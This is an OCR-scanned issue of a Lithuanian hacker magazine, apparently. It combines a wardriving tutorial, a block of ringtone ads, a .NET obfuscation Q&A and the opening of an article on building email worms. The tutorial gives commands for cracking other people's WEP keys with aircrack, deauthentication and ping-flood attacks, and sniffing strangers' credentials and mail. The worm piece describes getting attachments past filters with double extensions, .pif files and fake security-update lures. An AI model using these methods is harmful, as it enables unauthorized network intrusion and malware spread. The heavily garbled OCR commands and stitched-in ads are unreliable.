trino technologija, tai paskubėk atnaujinti savo sistemą iki nau 
jausios stabilios versijos (FreeBSD atveju iki 6.1 aroa CUR- 


RENT, OpenBSD — iki 3.8, Linux iki paskutinio stabilaus 
2.6 versijos branduolio). Esmė tame, jog šios si mos paly- 
ginus neseniai pradėjo pilnavertiškai pripažinti Centrino mik- 
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roschemos pagrindu sukurtas plokštes (Intel PROMWir 


vertis“ pripažinimas? Čia omeny turimas plokštės p: 
mas Monitor mode režimu. Kaip žinia, belaidė į 
sugebėti dirbti mažiausiai dviem režimais: BSS (Basic Service 
Set) aka Infrastructure, kuomet klientas prie tinklo prisijungęs 
per priėjimo tašką (paprastai belaidžiai tinklai kuriami būtent 
tokiu principu), ir IBSS (Independent Basic Service Set) aka 
ad-hoc, kuomet klientas prisijungęs be priėjimo taško |„taš: 
kas-taškas“ tipo ryšys, kuris naudojamas, pavyz „kai rei- 
kia bevieliu tinklu sujungti du kompiuterius, kurie nori apsi 
keisti duomenimis). Wardriverio trūkumas tame, jog nė vienas 
šių režimų netinka paketams perimti ir priėjimo taškams ap- 
tikti. Juk akivaizdu, jog abiem atvejais plokštė vienaip ar kitaip 
turėtų būti asocijuota su tinklu, 0 jos pervedimas į promisc 
mode režimą rimtų rezultatų neduos. Plokštė iš tiesų gaudys 
visus paketus, tačiau tik tuos, kurie adresuoti visiems kokio 
nors konkretaus tinklo (darbui kuriame plokštė ir yra sukonfi- 
gūruota) klientams. Tam, kad periminėtų visus 802.11 frei- 


mus, tačiau tuo pačiu nebūtų asocijuota nė su vienu tinklu, 
yra skirtas stebėjimo režimas (Monitor mode). Linux/BSD sis- 
temose šio režimo galimybę plokštės tvarkyklėje daugeliu at- 
veju nulemia plokštės specifikacijos atvirumas. Pilną funkcijų 
rinkinį priimančios tvarkyklės yra skirtos plokštėms su Prism- 
( .3), Orinaco, Atheros, Ralink ir Aironet mikroschemo- 
mis, Intel plokštės pradėtos naudoti ne taip senai („gimtoji“ 
BSD sistemoms skirta tvarkyklė tai daryti išmoko tik praėjusių 
metų gegužės 22 dieną). Be to, licencija neleidžia laisvai pla- 
tinti užkraunamos mikroprogramos (firmware), kurios reikia šių 
plokščių darbui, todėl BSD sistemų vartotojams ją teks susi- 
rasti patiems, kaip ir mikroprogramai užkrauti skirtą įranki Ip- 
wcontrol(8) (FreeBSD atveju). 

Po tvarkyklės antra pagal svarbumą plokštės galimybė — išori- 
nės antenos prijungimas. Tikriausiai niekam ne paslaptis, kad 
prijungus išorinę anteną su 8-10 dBi stiprinimo koeficientu (to- 
kią anteną galima lengvai įsigyti už 30-50 dolerių), bevielius 
tinklus galima aptikti kur kas didesniu spinduliu. nei naudojant 
| kompiuterį įmontuotą anteną. Kai kurios plokštės turi mažą 
lizdą, kuris vadinasi Lucent MC arba tiesiog MC. Pačios „nami 
formato antenos (nors, be abejo, galima įsigyti ir pramoninę 
outdoor anteną bei sumontuoti ją ant automobilio stogo) daž- 
niausiai komplektuojamos su RP-SMA Iizdu, todė! be plokštės 
ir antenos tau dar prireiks pigtai! perėjimo, kurį galima surasti 
radijo prekių parduotuvėse. 


Į„kismet“ — kiek daug tuo pasakyta!] Pagrindinis wardrive- 
rio įrankis — belaidžių tinklų skeneris-detektorius. O pagrindi- 
nis *nix tipo sistemoms skirtas skeneris — tai besąlygiškai Kis- 
met (ww.kismetwireless.net). Jis sukurtas naudojant kliento- 
serverio architektūrą (serveris paleidžiamas vienoje mašinoje, o 
klientai su grafine sąsaja paleidžiami nutolusiose mašinose ir 
susijungia su serveriu, po ko apdoroja iš jo gautą informaciją) Ir 
yra išskirtinai funkcionalus. Kismet gali būti integruotas ir su 
kita programine įranga, tokia, kaip IDS Snort arba GPS naviga- 
torius. Be viso kito, jis palaiko daugybę plokščių. 

Pereisime prie jo įdiegimo (FreeBSD atveju): 


ngiTt kismat 


Kismet moka suformuoti vaizdžius grafikus 


Dabar prieš pradėdami gilintis į Kismet nustatymus, šiek tiek 
dėmesio skirsime skenerio darbo principams. Kismet perveda 
plokštę į Monitor režimą ir pradeda „šokinėti“ per kanalus (chan- 
nel hopping), ieškodamas belaidžio tinklo srauto. Pagavęs sig- 
nalą, skeneris perima ir apdoroja belaidžius paketus (autentifi- 
kacinius, informacinius), kuo remdamasis nustato tinklo tipą, 
šifravimo galimybę, SSID, priėjimo taško gamintoja ir t.t. Adre- 
sacija ir klientų egzistavimas tinkle nustatomas perėmus kito 
tipo — duomenų — paketus. Taip Kismet veikia visiškai pasyviu 
režimu, todėl neleidžia savęs aptikti. 

Galima išdidžiai pasakyti, jog Kismet sugeba surasti net Ir „pa- 
slėptus“ tinklus. Čia „paslėptas“ tinklas reiškia priėjimo tašką, 
kuris sugeba atjungti Broadcast SSID funkciją. Pagal nutylėjimą 
AP siuntinėja valdančius tinklo paketus (beacons), kuriuose sau- 
goma tam tikra informacija, taip pat ir tinklo identifikatorius. 
Daugelis gamintojų kaip saugumo priemonę savo produktuose 
realizuoja tokio siuntinėjimo atjungimo galimybę. Nauda iš to 
gana abejotina: vos tik legalus tokio tinklo klientas inicijuoja 
duomenų perdavima, jis vis tiek išduoda SSID, ką Kismet gali 
lengvai aptikti. 

Kismet konfigūravimas pakankamai paprastas. Minimaliu atve- 
ju tereikia nurodyti vartotoją, su kurio teisėmis paleidinesime 
Kismet, ir plokštės tvarkykles. 


2 vi /usi/loal/eiY/kismet.conf 
suiduser — uzvernams 


Paleidinėti skėnerį root vardu nėra saugu, todėl mums reikia 
nurodyti vartotoją, iki Kurio teisių Kismet sumažins savo privile- 
gijas po to, kai jį paleis pats root. 
source radiotap bsd bathO,atheros 

Naudojama tvarkyklė nurodoma tokiu formatu: „tvarkykle,są- 
sajos pavadinimas, aljasas“, kas įsako skeneriui nurodytai są- 
sajai užkrauti atitinkamas tvarkykles, o po to vėliau operuoti 
šiuo įrašu su nurodytu aljasu. Pagrindinė Kismet kūrimo plat- 
forma — Linux, šios OS panaudojimo atveju plokštės tipas gali 
būti prism2, orinoco ir atheros, Ly. bet kuri palaikoma tvarkyklė 
(šią informaciją gali rasti Kismet puslapyje) 


pilnai apsiginklavę wardriverai 
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BSD sistemoms skirtas universalus wrapperis, kuris vadinasi 
Radiotap. Aš Kismet paleidžiu FreeBSD sistemoje, todėl ir nu- 
rodžiau radiotap bsd b. Kadangi mano plokštė realizuota su 
Atheros mikroschema, atitinkamai jos sąsaja yra athO. Visa tai 
pavadinta kaip atheros. Beje, radiotap galimybė atsirado tik šiose 
sistemose: FreeBSD 6.x/7.x, NetBSD -current ir OpenBSD, pra: 
dedant 3.7 versija. Apie operacinės sistemos atnaujinimą mes 
jau kalbėjome. 


enoblesources= atheros 


Šis užrašas aktyvuoja prieš tai paminėtą konfigūraciją. Taigi jei- 
gu tu naudoji skirtingas plokštes, tuomet gali nurodyti source 
tipo užrašus ir taip prireikus aktyvuoti atitinkamas plokštes. 

Iš esmės Kismet jau paruoštas darbui, tačiau mes eisime to- 
liau, Mes išmokysim Kismet suradus kiekvieną tinklą tuojau pat 
į tai atitinkamai sureaguoti ir pateikti visą informaciją. Tam mes 
ji integruosime su kalbančia programa Festival. 


Ust/poris/audio/testival 

make instal| dean 
+ vi /usi/locaV/ety/kismel.con[ 
peeCh — IrUB 
=/ust/local/bin/festival 
ch type =nalo 
A. enciygied= New vitim found, 5.i.d. 965, channel Vic, damn, it is enciypied. 
ech unencypied = New viclim found, s.5.j.d. Yas, chunnel Yoc, waohoo, il is open. 


r 


Jeigu duomenis reikia perduoti į kitos programos Įėjimą (pavyz- 
džiui, IDS), tuomet galima pasinaudoti fifo opcija 

Dar viena įdomi galimybė — integracija su GPS. Aplėkus pusę 
miesto ir aptikus keletą šimtų tinklų, būtų naudinga priėjimo 
taškų geografines koordinates sugretinti su miesto žemėlapiu, 
Kad po to žinotum, kur sugrįžti ;). *nix tipo sistemoms bendra- 
vimui su GPS įrenginiu skirtas specialus demonas gpsd 
(gpsd.sf.net). Viskas, ko tau reikia — tai su gpsd demonu su- 
derinamas įrenginys (su USB arba Serial jungtimi). Aktyvuoti GPS 
galimybę Kismet skeneryje galima su kismet.conf opcija 
gps=true. Gautos informacijos vizualizavimui į Kismet sudėtį 
įeina įrankis gosmap. Ji gali atvaizduoti maršrutą, tinklo paden: 


Euaūa ca+*+45 Re+v72 OlG aGaD ungax B 


e —— k 


belaidžio tinklo srautą 


gimo zoną, tinklo duomenis ir uždėti visa tai ant vietovės žemė- 
lapio. Reikiamus žemėlapius galima parsisiųsti iš interneto. 
Tarkim, wardriveris pervažiavo per miestą, aptiko daugybę tin- 
klų, ir dabar jam norisi pažiūrėti, kur yra priėjimo taškai, susie- 
jus juos su tam tikru žemėlapiu. Tuomet jis paleidžia: 

$ gpsmop -S 4 —moliic GPSIog 
Čia vėliavėlė -S nurodo, iš kur gpsmap pabandys gauti vietovės 
žemėlapi, 0 —metric parodo, kad gpsmap parsiunčiami žemė- 
lapiai bus metrinėje sistemoje (pagal nutylėjimą jame naudoja- 
mas mato vienetas yra mylia). Kitos gpsmap galimybės: 
—draw-track — wardriverio maršruto sekimas; 
—draw-power-z00m -— signalo stiprumo atvaizdavimas: 
—draw-legend — informacijos apie tinklus atvaizdavimas. 


Užbaigus konfigūravimą, pereikime į katalogą, į kurį gali rašyti 
suiduser'is, ir paleiskime Kismet: 


S a /imp 
7 lismet 


Čia bus paleistas serveris (pagal nutylėjimą jis klausosi 
127.0.0.1:2501), o po to ir klientas, kuris automatiškai prisi- 
jungs prie serverio. Aptikti priėjimo taškai bus tuojau pat pa- 
vaizduoti su visa reikiama informacija tinklo pavadinimu ir tipu, 
šifravimo būkle, kanalu, perimtų paketų kiekiu ir IP diapazonu 
Klientui pateikiama patogi konsolinė ncurses sąsaja. Pagrindi 
Niai raktai: 

e — išvesti Kismet serverių sąrašą (mūsų atveju jis vienintelis 
paleistas lokaliai). 

Z — pašalinti visus skydelius, išskyrus tinklų sąrašą (kad niekas 
netrikdytų dėmesio ;). Pakartotinas nuspaudimas grąžina visus 
paslėptus skydelius. 

m — įjungti/išjungti garsą. 

s — surūšiuoti tinklų sąrašą. Pagal nutylėjimą surasti tinklai 
atvaizduojami autofit režime. Rūšiuoti galima pagal tinklo atsi- 
radimo laiką, paketų kiekį, identifikatorius arba signalo stipru- 
mą. 

c — patogi galimybė peržiūrėti visus kliento tinklus (be viso kito, 
MAC ir IP adresus) 

L— išjungti channel hopping, „užrakinant“ jį nurodytame kana- 
le. Tai reiškia, kad tinklai nebus ieškomi kitais kanalais. 


aptiktų belaidžių tinklų sąrašas 


3500 žmonių aplodismentai GYVAS 63911 r 
Policijos racijos GYVAS 46911 ei DAUGIAU avon: E Taa Kasiogai 


Voverių daina GYVAS 82311 ž 
Vyro nlūniavimas GYVAS 69011 Telefone turi hūti WAP/GPRS nustatymai. Kaina 3 Lt 


Nuskrendantis malūnsparnis GYVAS 52711 


Harley Davidson GYVAS 60611 Š mELODIJOS 
Palaikymo komanda GYVAS 42511 


Girgždančios durys GYVAS 48911 Madonna - Sorry POLY 104621 MELO 197711 
Makllaiakas isaratą Ši ELL 45011 Mary J Blige feat. U2 - One POLY 1048311- MELO 198511 
io Ti riė d James Blunt - Goodbye My Luver POLY 105711 MELO 202111 
Kaina 3 tai. T. Spausk nuoroda ir aiisivsk garsa. Arash - Arash POLY 1045411 MELO 197611 
Area i Bas k as, Anastacia - Left Outside Alone POLY27211 | MELO 101411 

> Paul Van Dyk ft. W. Jackson - The Other Side POLY 1032411  MELO 186411 

sava žainimai Vedęs Ir turi vaikų POLY64511 | MELO118611 
Depeche Mode - Suffer Well POLY 105721 MELO 202211 
Tatu - Friend Or Foe POLY1048511  MELO 198711 
Lietuvos Himnas POLY14311 | MELO116711 
Flipsyde feat. Piper - Happy Birthday POLY 105671 MELO 201711 
Mattafix - Big City Life POLY 105701 MELO 202011 
M. Ravel - Bolero POLY 1030011  MELO 183511 
The Rasmus - Sail Away POLY 1036811- MELO 190611 

i: POLY 1048211 08584. 2. Siųsk numeriu 1673. 


JAVA 33511 JAVA 41511 JAVA 43011 
Pool 30 Log Rollin FC Neris 


1. Rašyk žinutę JAVA 33511 ir siųsk r ao Kanai, 

ją mameriu 1679. 2. Siųsk numeriu 1654. Nespalyoti Siemens ir Ericsson po kodo rašo 5 arba E raidę. Kaina 2 Iitai. 
2. Spausk nuorodą Ir atsisiųsk žaldimą. 

Telefone turi buti WAP Ir GPRS tunkcijos. 


Kaina 7 litai. "14 bk FOMAI 


Tinka: Motorola 7720. Nokia 3410, 
30, 3560, 3585, 89 


š2a0 be1o. Šš Šiso 6šon 66 8820. 
Zatų T210 TE SI, 7600, 


FONAS 22311 FONAS29311 FONAS 29611 FONAS 39911 FONAS 53011 
(O) LocoTIPAI ' 


MRsoNc GNBAZ  MGII me vž 
1060 242811 1060 262611 1060 268811 = p 
KKAXA  GūaDsw | ERA GE) "g 


1060 246211 1060 263611 Li 70211 
06 235 g FONAS 61411 FONAS 72611 FONAS k FONAS 94511 FONAS 124611 


Li > 
1060 272111 
= 2 > R | si 
L060 257211 1060 264611 1060 278411 
A, Aakpimų aso 428, 


ai Ikkksiia FONAS 126611 FONAS 133411 FONAS 136211 FONAS 238211 FONAS 244311 


LOGO 265411! Ass e aa Natas tai 
| ATVIRUKAI RA 


2 Roiubas Tous a FONAS 245411 FONAS 247611 
ir tiek. 1, Rašyk žinutę: FONAS 22311 


CARD 48011 CARD 61511 2. Siųsk numeriu 1679. 
ausk nsoroda Ir atsisi a 
oi 


3 
2 i: Tei turi būti a Ar GPRS f 
LOL Star, Aa a Ida SS un 
CARD 56211 CARD 80411 CARD 05411 


fe 


Greituolis x į 
CARD 59211 CARD 80711 CARD 85511 


1. Rašyk žinutę: CARD 48011. L-5-- visiems rail 


ms. 
t deliams bel otorbia 
2 asa a 48011 685840 Iš 500, Veoo T720, T721 i G100. či 00, TS N620, Kai E 788, 600 


Nospalvsti Siemons ir Ericsson po kado ST60, šui Ericsson T 30, P800, katino Ei T E700, X100, NiordaoLk Ššo, 
rašo S arba E raidę. Kaina 2 litai. VT50. 


CARD 39311 SPRS! Norėdami aktyvuoti GPRS, paskambinkite savo aperatariaus informacijos nij: 


Tele2 117, Bitė 1501, Omnitei 1! 
Kokybės telefonas +37068376806 nuo 12 iki 17. 
Turinio tiekėjai: „Mobile Vision Europe NV/SA“, „Indiagames Ltd.“, „Kilo ApS“, „Eurocom Cellular Communications", „Zindell Technologies, Ltd“, „Lunagames International B.V“ 


60) 
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H — grįžti prie channel hopping režimo. 
| — išsami informacija apie pasirinktą tinklą. 


Bendra informacija apie tinklą susideda iš identifikatoriaus 
(SSID), tinklo tipo (dažniausiai tai bus A — Access Point), šifra- 
vimo būklės (MW. kanalo (Ch), adresų diapazono (IP Range) bei 
įvairių vėliavėlių (išsamiau apie jas gali sužinoti įmontuotoje pa- 
galboje, mygtukas A). Kiekvienas tinklas turi spalvotą kodavi- 
mą, tinklo spalva apibrėžiama jo nustatymais. 

Pagal statistiką wardriveris dažniausiai aptinka „geltonus“ ir „rau- 
donus“ (pagal Kismet spalvų kodavimą pagal nutylėjimą) tinklus — 
tai nešifruojami tinklai ir priėjimo taškai su nustatymais pagal nu- 
tylėjimą (kuriuose nepakeistas nei IP adresas, nei SSID!). Aptikus 
tokius tinklus, wardriveris energingai paleidžia vieną iš pažangiau- 
sių tinklo sniferių/protokolų analizatorių Ethereal: 


S cd /ust/poris/net/ethereal 
7 make install den 


Nurodžius sniferiui klausytis belaidės sąsajos ir sukonfigūravus 
paprasčiausius filtrus, galima valandų valandas medituoti ste- 
bint tinklo srautą, gaudant „gardžius“ paketus su autentifikaci- 
jos duomenimis, pašto korespondencija ir visu tuo, kas priski- 
riama „konfidencialiai informacijai“ ;). Tačiau tikras wardriveris 
greičiausiai panašiais dalykais neužsiims. Jį domina pats tinklo 
aptikimo faktas ir galimybė prie jo prisijungti. Tiesa, juk mes ne 
kokie chuliganai ;). Prisijungimui labai pravers kryptinė antena, 
nes be jos gali susidaryti nemaloni situacija, kuomet tinklas yra 
aptiktas, paketai perimami, tačiau prisijungimui trūksta signalo 
galingumo. 


[Starto raktas] Bet ką daryti, jeigu Kismet tinklą nuspalvino 
žalia spalva, kas reiškia, jog jis šifruojamas. Jeigu W grafoje yra 
reikšmė Y, tai reiškia, jog tinklas apsaugotas WEP'u, iš ko iš- 
plaukia, jog raktą galima pabandyti nulaužti. 

Kaip žinia, WEP (Wired Eguivalent Privacy) protokole aptikti es- 
miniai pažeidžiamumai (išsamų pasakojimą apie tai galima rasti 
straipsnyje „Orinis atmetimas“, publikuotame mūsų žurnalo 


tepdimo: data Mink type 1EEE802 11 
EE verbozs output suppresšed, use =v or >wv for ful] pratocol decode 
Miszenino 


aneo, Anko 
Data IV 


Elas Pad G Keyti 


aa Pad O Ke) 


Data IV:3aiaa Pad 0 Ke 


:23 OšE01 Te Ža ies 49. LO 10 192S 
iestamp 2457899451 2779829,nop, wscale 0> 
22:23:30.103686 Data IV:3ažaa Pad O KeyIO O 
:23:30.147071 IP 62.118.249.10.110 > 192.168.1.3. 
žaizo 17106 Data Iv:3iaa2 Pad O KeyID D 
23:30.189644 2. 49. 


3 

5 

ip ež:iis Sio dao 3 is2:15813: 

Data IV:žaiaa Pad O keyID O 

IP 62118. ŽAS.10 210 77 152,168.1.3. 

Data IV:Jaaaa Pad O KeyIO O 

IP 62.118.249.10.110 > 192.168,1.3. 
3 
2 


Data IV:žaaaa Pad O KeyID 
IP 62.118.249.10.110 > 192.168.1.3. 


> 
22:23: 
>>173:301 556120 TP 62.118.749.1 


20-501558 Data Iv:Zasaa pad O KeyzD 
AP aka. 


naudojamės tinklo paketų analizatoriumi tepdump 


2006.01 mėnesio numeryje, ][.32). Juos išsiaiškinus atsirado 
daugybė įrankių, kurie nulaužia raktą remdamiesi perimtų pa- 
ketų analize. Kartu su nulaužimo metodais tobulėjo ir patys 
įrankiai (pirmosios „WEP laužimo įrankių“ kartos programoms, 
tokioms, kaip dwepdump ir airsnort, reikėjo vos ne gigabaitų 
tinklo srauto), dabar pažangiausias ir pats greičiausias laužimo 
metodas įgyvendintas aircrack (www.crO.net:8040/code/net- 
work/aircrack/) įrankių rinkinyje. | šį rinkinį įeina paketams su- 
rinkti skirtas airodump, paketams įterpimui į tinklą skirtas ai- 
replay, raktui nulaužti skirtas aircrack ir airdecap, kuris pateikia- 
mas kaip priedas surinktiems WEP/MWPA duomenims dešifruoti. 
Aircrack veikia kur kas greičiau, nei jo pirmtakai. Rakto nulauži- 
mas tik laiko klausimas, o sėkmingai atakai reikia sukaupti 
pakankamą paketų kiekį su inicializacijos vektoriais (IV, visą te- 
oriją apie WEP galima rasti prieš tai paminėtame straipsnyje). 
128 bitų raktui nulaužti su aircrack reikia apie 500000 paketų 
kas sudaro keletą valandų darbo gerai apkrautame belaidžia- 
me tinkle. Paprasčiausiu atveju galima tiesiog pasyviai perimi- 
nėti paketus su airodump. Deja, airodump (kaip ir aireplay) yra 
išimtinai Linux sistemai skirtas produktas, ir kol kas neatsirado 
nė vieno savanorio, kuris šiuos naudingus įrankius perkeltų į 
BSD sistemą. 

Su šia komanda mes perimame vienuoliktu kanalu perduoda- 
mus paketus ir rašome juos į bylą dumpfile: 


4 airodump eth] dunpfile 11 
O po to ant šios bylos užsiundome aircrack: 
S airtack dumpfila.cap 


Pastebėsiu, kad aircrack moka laužti ne tik WER bet ir WPA 
PSK raktus. Jeigu surinkta pakankamai paketų su IV, po kurio 
laiko aircrack pasveikins tave užrašu KEY FOUND! 

Vienintelė tokio pasyvaus metodo problema — procesas gali 
vykti labai lėtai. Norint raktą nulaužti greičiau (o tai reiškia 
sukaupti reikiamą paketų su IV kiekį), reikia priversti tinklą 
generuoti tokius paketus. Jeigu tu turi priėjimą prie kokios 


sudo tepdump -ni wi0 -51500 -y IEEES02.11 


e IEEE802.11 (802.11), capture size 1500 bytes 
2š Dede ies AŠ kasa: TMP echo reply, 1d 14349, seą 0, Tength 64 
i šasi 10MP echo reply, 1d 14349, seą 1, Tength 64 
abi : ICMP echo reply, id 14349, seą 2, Tength 64 
ki db .1,3: I6MP echo reply, 1d 14349, 


seą 3, Tength 64 


„56970: S 2428117574:2428117574 (0) ack 575184677 win 5792 «mss 1460,sackok,ti 


1:75(78) ack 1 win 5792 <nop, nop,timestamp 2457899455 2779872> 


5 3Sk Terin,3792 5704. nop,imestanp 2457895460 279916 
79:108(29) ack 7 win 5 


108:226(118) ack 7 win 5792 <nop, nop,timestamp 2457899475 2780065> 
226:253(27) ack 13 win 5792 <nop, nop,timestamp 2457899481 2780118> 
253:332(79) ack 115 win 5792 <nop,nop,timestanp 2457835486 2780171> 
332:888(556) ack 115 win 5792 <nop,nop,timestamp 2457899500 2780323 


92 <nop,nop, timestamp 2457895460 2779916> 


56970: P. R8R:RG4 (6) ack 217 win 5797 cnon. non.rimestamn 2457899507 2780370> 


nors tinkle esančios mašinos, tuomet veiksmingiausias me- 
todas — su komanda ping -f suorganizuoti ICMP paketų aud- 
rą. Tokiu atveju reikiamas paketų su IV kiekis bus sukauptas 
per keletą minučių ;). Jeigu panašios galimybės nėra, derėtų 
imtis rafinuotesnių metodų 

Pavyzdžiui, galima belaidžio tinklo klientus priversti generuoti 
tinklo srautą, nuolat persijungiant prie AR t.y. suorganizuoti taip 
vadinamą deauth attack. Klientams deautentifikacijos paketus 
siuntinėsime su Void11 (www.wlsec.net/void11/). Šis įrankis 
gali suorganizuoti tikrą DoS, užversdamas belaidžius tinklus de- 
autentifikacijos paketais. Be to, jis moka flūdinti ir patį AP siun- 
tinėdamas jam padirbtas autentifikacines užklausas skirtingų 
adresų vardu. Deja, vėl derėtų paminėti, jog ir Void11 veikia tik 
Linux sistemoje, o norint, kad jis veiktų, reikia įdiegti Linux Hos- 
WP (hostap.epitest.fi) tvarkyklę. 

Kaip tu pameni, Kismet mums gali parodyti tinklo klientų sąra. 
šą. Mums prireiks jų MAC adresų bei priėjimo taško MAC adre- 
so. Po to paleidžiame Void11: 


anfig wlan made r 
anū ha; 
* void|! panetration -Ū -s <kliento: 


JAC aliesas> -B <AP MAC adresas: 


Tokios atakos rezultatas — kliento deautentifikacija, po kurios 
Jis bus priverstas nuolat iš naujo jungtis prie tinklo, tuo pačiu 
išduodamas mums reikalingą IV. 

Nenorint paversti network į notwork, galima pasinaudoti labiau 
džentelmenišku“ būdu — replay attack ataka, panaudojant įrankį 
aireplay, kuris perima legalius paketus ir siunčia juos pakartoti- 
nai daug kartų. 


[Jūsų nugara mėlyna] Savaime suprantama, belaidės links- 
mybės neapsiriboja vien tik Wi-Fi tinklais. Kitą kartą mes 
pakalbėsime apie uniksoido-bliudžekerio arsenalą ir paver- 
sime mūsų Unix sistemą grėsmingu mėlynųjų dantų medžio- 
tojo ginklu. 


madingas wardriverių instrumentas 


No 


Kodėl .NET programuotojai taip baiminasi dėl 
savo kodo konfidencialumo ir kokiu būdu šį 
kodą galima apsaugoti? 


A: .NET programuotojų jaudinimasis turi visiškai 

pagristą pagrindą. Esmė tame, kad bet kurio „NET 

produkto struktūra tokia atvira, jog turint specia- 
lius įrankius, kurie yra laisvai prieinami, galima ne 
tik sudaryti klasių struktūrą, bet net disasembliuoti 
metodų kodą. Bet kurio .NET produkto bait-kodas 
pateikiamas specialia IL kalba (/Intermediate Lan- 
guage), kuri yra lengvai analizuojama, todėl išp) 
džius tam tikras sąlygas dekompiliatoriai be pro- 
blemų atstato programos listingą su aukštesnio |y- 
gio kalba, pavyzdžiui Ct. Tu tik įsivaizduok: paten- 
kinus tam tikras sąlygas, iš vykdomos bylos galima 
gauti išeities tekstą, kuris praktiškai identiškas pra- 
diniam! 
Savaime suprantama, tai nėra labai gerai, kadangi 
dabar paslėpti savo kodą nuo tyrinėjimų kur kas 
sudėtingiau. Norint pakeisti tokią padėtį, sparčiai 
paplito vadinamieji obuskatoriai. Nesigilinant į c 
tales, taip keistai pavadinta programa tikruosius 
sų metodų, kintamųjų vardus ir vardų erdves keičia 
į kitus laisvai pasirinktus vardus (pavyzdžiui, į 
gdf, dsf234, fdsf ir kitus beprasmius simbolių 
rinkinius). Po tokių pakeitimų analizuoti programos 
išeities tekstą pasidaro praktiškai neimanoma. Ob- 
Tuskatorių sukurta Išties nemažai. Išskirti galėčiau 
RemoteSoft Salamander Obtuscatar (http://www.re- 
motesoft.com/salamander/obfuscator.html) ir 9Ra 
ys.Net ILObfuscator (www. Orays.net/cgi-bin/compo: 
nents.cgi?act=1ėcid=86). Išsamiau apie naudo 
jamas funkcijas ir veikimo principą galima paskai- 
tyti šiame straipsnyje: „Obfuskacija yra toks Ž 
dis“ (www.aspnetmania.com/Articles/Arti: 
Ie.aspx?ID=36, rusų kalba). 
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Veisiam kirminus 

MANAU, JOG TOKS REIŠKINYS, KAIP MASI- 
NIS KIRMINŲ PAPLITIMAS INTERNETE, PA- 
UETĖ KIEKVIENĄ. TU TIKRIAUSIAI JAU PA- 
ŽISTAMAS SU TOKIAIS TINKLINIAIS BESTU- 
BURIŲ ATSTOVAIS, KAIP BEAGLE IR MYDO- 
OM, KURIE UŽKRĖTĖ ŠIMTUS TŪKSTANČIŲ 
MAŠINŲ IR SUKĖLĖ NEMAŽĄ TRIUKŠMĄ. 
TU MANAI, KAD PAČIAM SUKURTI PANAŠŲ 
ŽVĖRIUKĄ LABAI SUNKU? TAIP NĖRA, ELEK- 
TRONINIO PAŠTO KIRMINAS Iš TIESŲ NĖ- 
RA NIEKO SUDĖTINGO. ŠIAME STRAIPSNY- 
JE AŠ PABANDYSIU TAI „ĮRODYTI PAPASA- 
KODAMAS TAU APIE PAŠTO KIRMINŲ VEI- 
KIMO PRINCIPUS IR APIE JŲ REALIZACIJOS 
YPATYBES. TAČIAU NORĖČIAU IŠ KARTO TA- 
VE ĮSPĖTI, KAD KIRMINAI YRA YPATINGAI 
PAVOJINGI, TODĖL ELGTIS Su JAIS REIKIA 
YPAČ ATSARGIAI, NES PRIEŠINGU ATVEJŲ 
GALIMA PRIDARYTI BĖDOS IR ATSIDURTI UŽ 
GROTŲ. DĖL TO VISĄ STRAIPSNYJE PATEIKTĄ 
MEDŽIAGĄ DERĖTŲ PANAUDOTI TIK MOKS- 
LINIAIS TIKSLAIS. ŽODŽIU, PRADEDAM 
VEISTI KIRMINUS. 


Kas tie pašto kirminai ir su kuo juos valgo 
[Kaip veikia kirminas?] Bendras visų elektroninio pašto kir- 
minų darbo principas — tai laiškų siuntinėjimas, kurių priesa- 
gose (attachment) yra vartotojui skirta kirmino kopija. Tu tik 
riausiai manai, jog tai nesąmonė, kadangi prisegtų bylų šiais 
laikais jau niekas nepaleidinėja. Vis dėlto statistika byloja, jog 
abejotinas su laišku atsiųstas priesagas paleidžia 2-394 var- 
totojų, o to visai pakanka kad kirminas sėkmingai paplistų. Po 
paleidimo kirminas kaip nors įrašo save į sistemos automati- 
nio paleidimo sritį. Kitas kirmino darbo etapas yra visų užkrės: 
toje mašinoje esančių elektroninio pašto adresų paieška, kuo: 
met jie išgaunami iš Outlook (arba kitų pašto programų) adre: 
sų knygutės bei ieškomi html, txt ir doc bylose visuose užkrės: 
tos mašinos diskuose. Trečiasis kirmino gyvenimo etapas yra 
savęs siuntinėjimas šiais surastais adresais. Visa tai iš pirmo 
žvilgsnio atrodo primityvu, tačiau visuose etapuose yra daugy- 
bė svarbių niuansų, kuriuos būtinai reikia įvertinti norint kad 
kirminas ilgai ir laimingai gyvuotų. Būtina priversti serverį pri 
imti laišką, o vartotoją — paleisti laiško priedą. Nepaprasta 
taip pat bus kova su antivirusais, pašto sistemų spamo fil- 
trais, ugniasienėmis ir įvairiais pačių pašto klientų priesagų 
filtrais. Kitaip tariant, kirminų kūrėjams problemų pakanka 
Taigi iš eilės pradėsime visų kirmino gyvavimo etapų aptarimą 
Pradėsime nuo, mano nuomone, svarbiausio klausimo, kuris 
iškyla kuriant kirminą: kaip priversti vartotoją paleisti laiško prie- 
dą? Visų pirma reikia apeiti techninio pobūdžio problemas, svar- 
biausia kurių gali būti draudimas pašto programoje atidaryti vyk 
domas bylas. Jau seniai praėjo tie laikai, kuomet buvo galima 
drąsiai kam nors išsiųsti exe bylą ir tikėtis, kad vartotojas ją 
paleis. Dabar net ir pats bukiausias vartotojas (kuriam ir skirti 
pašto kirminai) tokio priedo nepaleis dėl to, kad to jam padaryti 
neleis pašto programa arba laišką pašalins ugniasienės filtras. 
Pirma į galvą šovusi mintis — vykdomą bylą įkurdinti archyve. 
Pašto filtrai nerizikuoja pašalinti tokių priedų, o vartotojui ne 
sunku atidaryti tokį archyvą ir paleisti bylą. Jeigu archyvą papil- 
domai apsaugotume slaptažodžiu ir pateiktume jį laiško tekste, 
tuomet tokį laišką praleis ir pašto serveriuose įdiegti antivirusai, 
tačiau užkrėtimų procentas šiek tiek sumažės. 

Tarkim, mums pavyko sukurti laiško priedą, kuris praeina visus 
pašto filtrus ir sėkmingai patenka pas vartotoją. Dabar iškyla 
užduotis priversti vartotoją jį paleisti. Nuo senų laikų tam nau- 
dojama socialinė inžinerija, t.y. paprasčiausias akių dūmimas. 
Taigi laiške rašoma, kad jame pateikiami saugumo atnaujini- 
mai (security updates) arba dar kokia nors naudinga programa. 
Taip pat paplitęs metodas yra kurti bylų archyvus su dvigubais 
praplėtimais, kuomet byla dažniausiai pavadinama .x!s/labai daug 
tarpų].exe ir jai priskiriama Microsoft Excel ikonėlė. Dažnai tro- 
janai prieduose prisegami su .pif praplėtimu, kuris Exploreryje 
nevaizduojamas net tuomet, kai įjungtas visų bylų praplėtimų 
atvaizdavimas. 

Manau, dabar tau jau aišku, kas tie pašto kirminai ir kaip jie 
turėtų veikti. Dabar aptarkime techninius klausimus, kurie išky- 
la bestuburių kūrimo procese. 


